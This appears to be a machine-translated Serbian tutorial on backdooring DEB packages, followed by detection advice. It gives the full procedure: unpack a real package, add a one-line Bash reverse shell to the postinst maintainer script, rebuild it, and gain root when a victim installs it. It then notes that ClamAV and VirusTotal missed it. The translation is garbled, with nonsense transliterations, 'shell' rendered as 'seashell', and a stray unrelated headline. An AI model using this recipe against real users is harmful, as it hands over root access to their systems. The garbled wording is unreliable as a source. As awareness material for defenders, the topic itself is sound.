Како су ДЕБ пакети скривени и како то открити

by
Tweet
Share
Share
Pin

Кључне Такеаваис

  • ДЕБ пакети се могу лако користити у бацкдоору, омогућавајући нападачима да убаце злонамерни код у ваш систем када их инсталирате са роот дозволама.
  • Заражене ДЕБ пакете је тешко открити, јер их антивирусни софтвер или решења у облаку као што је ВирусТотал можда неће означити.
  • Да бисте се заштитили, избегавајте преузимање ДЕБ пакета са насумичних локација, држите се званичних сајтова за преузимање или сајтова од поверења заједнице и размислите о инсталирању безбедносних алата да бисте заштитили свој Линук систем од мрежних напада.

ДЕБ датотеке су софтверски пакети који су примарни формат за испоруку софтвера на Дебиан-базираним Линук дистрибуцијама.

Да бисте инсталирали ДЕБ пакете, морате да користите менаџер пакета као што је дпкг са роот дозволама. Нападачи користе ово и убризгавају бацкдоор у ове пакете. Када их инсталирате помоћу дпкг или било ког другог менаџера пакета, злонамерни код се такође извршава и компромитује ваш систем.

Хајде да истражимо тачно како су ДЕБ пакети скривени и шта можете да урадите да бисте се заштитили.

Како се ДЕБ пакети користе у позадини?

Пре него што схватите како су ДЕБ пакети скривени у позадини, хајде да истражимо шта се налази унутар ДЕБ пакета. За демонстрацију, преузећу Мицрософт Висуал Студио Цоде ДЕБ пакет са званичне Мицрософт веб локације. Ово је исти пакет који бисте преузели ако желите да инсталирате ВС Цоде на Линук.

  Како добити све своје Амазон пакете истог дана

Преузимање: Висуал Студио Цоде

Сада када сте преузели циљни пакет, време је да га распакујете. Можете распаковати ДЕБ пакет користећи команду дпкг-деб са ознаком -Р праћеном путањом за складиштење садржаја:

 dpkg-deb -R <package_name> <path>

Ово би требало да издвоји садржај пакета ВС Цоде.

Крећући се у фасциклу наћи ћете више директоријума, међутим, наш интерес лежи само у ДЕБИАН директоријуму. Овај директоријум садржи скрипте за одржавање које се извршавају током инсталације са роот привилегијама. Као што сте можда већ схватили, нападачи модификују скрипте у овом директоријуму.

За демонстрацију, изменићу постинст скрипту и додати једноставну Басх обрнуту ТЦП шкољку. Као што име каже, то је скрипта која се извршава након што се пакет инсталира на систем.

Садржи команде које финализују конфигурације као што су постављање симболичких веза, руковање зависношћу и још много тога. На интернету можете пронаћи тоне различитих обрнутих шкољки. Већина њих ће радити исто. Ево примера обрнуте шкољке у једној линији:

 bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Објашњење команде:

  • басх: ​​Ово је команда која позива Басх шкољку.
  • -и: Заставица говори Басху да ради у интерактивном режиму омогућавајући командни улаз/излаз у реалном времену.
  • >& /дев/тцп/ип/порт: Ово преусмерава стандардни излаз и стандардну грешку на мрежну утичницу, у суштини успостављајући ТЦП везу са <ип> и <порт>.
  • 0>&1: Ово преусмерава улаз и излаз на исту локацију, тј. на мрежну утичницу.

За оне који нису упућени, реверзна љуска је тип кода који, када се изврши на циљној машини, иницира везу назад са машином нападача. Обрнуте шкољке су одличан начин да се заобиђу ограничења заштитног зида пошто се саобраћај генерише са машине иза заштитног зида.

Ево како изгледа измењена скрипта:

Као што видите, све је исто, али је додат само један ред, односно наш Басх реверсе схелл. Сада морате да вратите датотеке у „.деб“ формат. Једноставно користите команду дпкг са заставицом –буилд или користите дпкг-деб са заставицом -б коју прати путања екстрахованог садржаја:

 dpkg --build <directory>
dpkg-deb -b <directory>

Сада је ДЕБ пакет са бацкдоором спреман за испоруку на злонамерне сајтове. Хајде да симулирамо сценарио где је жртва преузела ДЕБ пакет на свој систем и инсталира га као било који други обичан пакет.

Горње терминално окно је за ПОВ жртве, а доње је ПОВ нападача. Жртва инсталира пакет са судо дпкг -и, а нападач стрпљиво ослушкује долазне везе користећи команду нетцат у Линук-у.

Чим се инсталација заврши, приметите да нападач добија обрнуту везу љуске и сада има роот приступ систему жртве. Сада знате како су ДЕБ пакети скривени у позадини. Хајде сада да научимо како се можете заштитити.

Како открити да ли је ДЕБ пакет злонамеран

Сада када знате да су заражени ДЕБ пакети ствар, сигурно се питате како да пронађете заражене. За почетак, можете покушати да користите Линук антивирусни софтвер као што је ЦламАВ. Нажалост, када је ЦламАВ скенирање покренуто на пакету, није га означило као злонамерно. Ево резултата скенирања:

Дакле, осим ако немате врхунско антивирусно решење (што није гаранција да нећете бити хаковани), прилично је тешко открити злонамерне ДЕБ пакете. Хајде да покушамо да користимо решење у облаку као што је веб локација ВирусТотал:

Као што видите, ВирусТотал није открио ништа лоше са њим. Па, једини начин да се заштитите од таквих претњи је да пратите основну безбедносну хигијену као што је не преузимање датотека из непознатих извора, увек провера хеш датотеке и уопште избегавање инсталирања сумњивог софтвера.

Интернет је пун таквих претњи. Једини начин да сурфујете без губљења података је да имате памети о себи и прегледате поуздане сајтове. Поред тога, за Линук, такође треба да покушате да пронађете да ли софтвер који преузимате има варијанту АппИмаге јер су самостални и могу да буду заштићени и на тај начин се држе ван контакта са вашим системом.

Немојте преузимати ДЕБ пакете са случајних локација!

ДЕБ пакети нису сами по себи лоши, међутим, нападачи могу лако да их наоружају и пошаљу корисницима који ништа не сумњају. Као што је показано, ДЕБ пакет се може лако отворити и модификовати за додавање прилагођеног кода са само неколико команди, што га чини уобичајеним вектором за испоруку малвера.

Чак и једноставна позадинска врата на ДЕБ пакетима остају неухваћена врхунским антивирусним решењима. Зато је најбоље да играте на сигурно, носите свој здрав разум док сурфујете вебом и увек преузимате софтвер само са званичних сајтова за преузимање или са сајтова од поверења заједнице.

Сада када сте свесни безбедносних ризика који долазе са инсталирањем ДЕБ пакета са нових или непознатих локација, требало би да будете опрезни када инсталирате нови софтвер. Међутим, само пазити на оно што инсталирате није довољно. Ваш Линук систем такође може бити мета мрежних напада.

Да бисте били сигурни да сте безбедни у случају мрежног напада, требало би да размислите о инсталирању алата за безбедност мреже.